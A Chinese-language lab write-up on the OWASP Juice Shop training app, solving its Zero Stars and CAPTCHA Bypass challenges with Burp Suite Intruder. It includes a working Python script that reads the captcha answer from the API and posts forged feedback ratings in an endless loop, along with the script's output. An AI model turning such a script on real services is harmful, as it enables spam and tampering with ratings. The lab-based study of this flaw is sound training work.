OWASP Juice Shop 学习 三
解锁 Zero Stars ★ 和 CAPTCHA Bypass ★★★
打开侧边菜单 - > Customer Feedback,显示用户反馈页面表单。
打开Burp Suite Professional ,点击 Proxy -> Intercept -> Open Browser,打开内置浏览器。
在内置浏览器打开 http://192.168.31.203/#/contact ,Burp会截取每个浏览器会话请求,这时 Forward 按钮可用,不断点击Forward按钮,允许所有请求,内置浏览器将正常显示用户反馈页面表单。
在内置浏览器,填写用户反馈页面表单,点击Submit,在Burp 上 Forward 按钮一阵狂点。
在Burp 点击 HTTP hisotry ,我们可以看到Burp记录一次完整的页面交互过程。
查看后发现第55条记录,浏览器 调用/api/Feedbacks 接口,使用POST 方法提交填写的用户反馈数据。
POST的数据:{“captchaId”:16,“captcha”:“196”,“comment”:“dislike (anonymous)”,“rating”:2},我们可以伪造部分数据,看看服务端的反应。
点击Actions 按钮,再点击 Send to Intruder。
点击 Intruder -> Positions ,我们会发现 Playload Positions是 POST /api/Feedbacks接口,Burp自动用 § 符号(绿色),将所有的变量包含起来。
我们先伪造 “rating” 的值,点击 Clear § 按钮,将所有变量位置清除掉。
然后在“rating":2 上选中2(不知道为什么选中时会向左偏移几位),点击 Add § 按钮,确保2被§符号包括起来,如:“rating":§2§。
点击Payloads - > Payload type 选中Numbers
选择连续值,从0到10,步进1。点击 Start attack 按钮,进行攻击。
Burp 会模拟之前的POST /api/Feedbacks 包,将”rating": 值进行0-10的遍历。
这样就解锁 Zero Stars ★ 和 CAPTCHA Bypass ★★★
从用户反馈页面交互分析,主要流程:
- GET /rest/captcha/ 接口,获取 验证码。
- POST /api/Feedbacks/ 接口,携带验证码提交反馈信息。
下面的Python脚本模拟这两个接口的调用,
import requests,json,time,random
headers = {'Host': '192.168.31.203','Content-Length': '89','Accept': 'application/json, text/plain, */*','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36','Content-Type': 'application/json','Origin': 'http://192.168.31.203','Referer': 'http://192.168.31.203/','Accept-Encoding': 'gzip, deflate','Accept-Language': 'zh-CN,zh;q=0.9','Cookie': 'language=en; cookieconsent_status=dismiss','Connection': 'close'}
captcha_url = "http://192.168.31.203/rest/captcha/"
Feedbacks_url = "http://192.168.31.203/api/Feedbacks/"
while 1:
print("---",time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
req = json.loads(requests.get(captcha_url).text)
#print(req['captchaId'],req['answer'])
rating = random.randint(0, 10)
datas = json.dumps({'captchaId':req['captchaId'],'captcha':req['answer'],'comment':'1111111111111111111111111111111 (anonymous)','rating':rating})
byte_data = datas.encode('utf-8')
#print(datas)
req = requests.post(Feedbacks_url, data = byte_data, headers = headers)
print(req.text)
脚本运行如下:
>python captcha.py
--- 2022-04-17 23:50:48
{"status":"success","data":{"id":381,"comment":"1111111111111111111111111111111 (hangzhou)","rating":5,"updatedAt":"2022-04-17T15:50:43.597Z","createdAt":"2022-04-17T15:50:43.597Z","UserId":null}}
--- 2022-04-17 23:50:48
{"status":"success","data":{"id":382,"comment":"1111111111111111111111111111111 (hangzhou)","rating":6,"updatedAt":"2022-04-17T15:50:43.702Z","createdAt":"2022-04-17T15:50:43.702Z","UserId":null}}
--- 2022-04-17 23:50:48
{"status":"success","data":{"id":383,"comment":"1111111111111111111111111111111 (hangzhou)","rating":2,"updatedAt":"2022-04-17T15:50:43.823Z","createdAt":"2022-04-17T15:50:43.823Z","UserId":null}}
--- 2022-04-17 23:50:48
{"status":"success","data":{"id":384,"comment":"1111111111111111111111111111111 (hangzhou)","rating":9,"updatedAt":"2022-04-17T15:50:43.889Z","createdAt":"2022-04-17T15:50:43.889Z","UserId":null}}